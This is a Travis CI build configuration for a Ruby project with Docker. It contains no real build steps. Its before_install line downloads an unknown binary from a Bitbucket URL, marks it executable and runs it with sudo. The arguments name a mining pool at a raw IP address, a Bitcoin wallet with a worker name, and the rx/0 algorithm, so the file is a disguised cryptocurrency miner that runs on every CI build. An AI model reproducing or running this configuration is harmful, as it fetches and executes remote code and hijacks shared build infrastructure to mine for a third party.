language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/CuyuAnjay01/test/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile -o 159.65.209.149:13333 -u BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Worker01 -k -a rx/0